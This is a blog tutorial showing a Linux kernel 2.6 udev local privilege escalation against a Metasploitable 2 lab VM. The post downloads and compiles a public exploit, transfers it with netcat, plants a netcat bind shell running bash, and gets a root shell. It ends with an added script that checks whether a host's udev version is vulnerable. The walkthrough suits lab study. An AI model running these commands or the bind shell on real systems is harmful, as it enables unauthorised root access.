metalkey

Hacking tutorials + info

Linux Kernel 2.6 UDEV < 141 – Local Privilege Escalation Exploit Example

July 02, 2016 — metalkey
Attacker: Kali Linux
Victim: Metasploitable 2

Note: This exploit leverages a vulnerability in how udev handles NETLINK messages.
More information on NETLINK can be found on the Linux Foundation website (http://www.linuxfoundation.org/collaborate/workgroups/networking/generic_netlink_howto).

Download the Exploit from ExploitDB

Head over to the Exploit Database and download Jon Oberheide’s udev exploit for Linux Kernel 2.6 (https://www.exploit-db.com/exploits/8572/).

Telnet to Metasploitable 2, then Upload and Compile the Exploit

Telnet to Metasploitable 2, then start a netcat listener.
In Kali, we're going to tar the exploit and pipe the output to netcat.
In Metasploitable 2, we're going to receive and untar the exploit, then compile it with gcc.

root@kali:~$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.

Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password: msfadmin
Linux metasploitable 2.6.24-16-server #1 SMP i686

msfadmin@metasploitable:~$ nc -lvp 12345 | tar -xf -
listening on [any] 12345 ...

Open a new tab, tar the exploit and pipe the output to netcat

root@kali:~$ tar -cf - 8572.c | nc -vn 192.168.1.10 12345
(UNKNOWN) [192.168.1.10] 12345 (?) open

Back in the first tab we can see our Kali machine connect.
Allow a few seconds for the file transfer to complete, then press CTRL+C to end the session.
Check that the exploit has been received, then compile it with gcc.

connect to [192.168.1.10] from kali [192.168.1.182] 48411
msfadmin@metasploitable:~$ ls -lah 8572.c
-rw-r--r-- 1 msfadmin msfadmin 2.9K 2015-11-05 04:14 8572.c
msfadmin@metasploitable:~$ gcc 8572.c -o 8572

Executing the Exploit

Now we just need to get the PID of the process that owns the udevd netlink socket on Metasploitable 2 (the Pid column, third from the left, in the /proc/net/netlink entry below), create our run script (which binds an instance of bash to a netcat listener) and execute the exploit.

msfadmin@metasploitable:~$ cat /proc/net/netlink
df552800 15 2738 00000001 0 0 00000000 2
msfadmin@metasploitable:~$ cd /tmp
msfadmin@metasploitable:/tmp$ nano run
#!/bin/bash
nc -lvvp 2345 -e /bin/bash
msfadmin@metasploitable:/tmp$ cd
msfadmin@metasploitable:~$ ./8572 2738

Open a new tab and connect to the bind shell

root@kali:~$ nc -vn 192.168.1.10 2345
(UNKNOWN) [192.168.1.10] 2345 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/# whoami
root
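The walkthrough above only works because the target's udev predates release 141. As an added example (not part of the original post), here is a small POSIX shell check an administrator can run on a host to find out whether its udev is older than that release; it assumes one of udevadm, udevinfo or udevd is on PATH (older distributions such as the one Metasploitable 2 runs ship udevinfo).

```shell
#!/bin/sh
# Added example, not from the original post.
# Reports whether the installed udev is older than 141, the release
# that fixed the netlink handling this exploit depends on.

# Return 0 (true) when the given udev version string is below 141.
# Accepts raw numbers ("117"), package-style strings ("117-8ubuntu1")
# and tool banners ("udevinfo, version 117").
udev_is_vulnerable() {
    ver="$1"
    # Keep only the leading run of digits after any text prefix.
    num=$(printf '%s' "$ver" | sed 's/^[^0-9]*//; s/[^0-9].*//')
    if [ -n "$num" ] && [ "$num" -lt 141 ]; then
        return 0
    fi
    return 1
}

# Print the installed udev version using whichever tool is available.
# Assumed tool names and flags: udevadm --version, udevinfo -V,
# udevd --version. Prints nothing if none of them is present.
udev_version() {
    if command -v udevadm >/dev/null 2>&1; then
        udevadm --version 2>/dev/null
    elif command -v udevinfo >/dev/null 2>&1; then
        udevinfo -V 2>/dev/null
    elif command -v udevd >/dev/null 2>&1; then
        udevd --version 2>/dev/null
    fi
}

# Check this host. Version detection failure is reported, not fatal.
ver=$(udev_version) || ver=""
if udev_is_vulnerable "$ver"; then
    echo "udev '$ver' is older than 141: update udev on this host"
else
    echo "udev version '${ver:-unknown}': not affected or undetermined"
fi
```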

Tags: privilege-escalation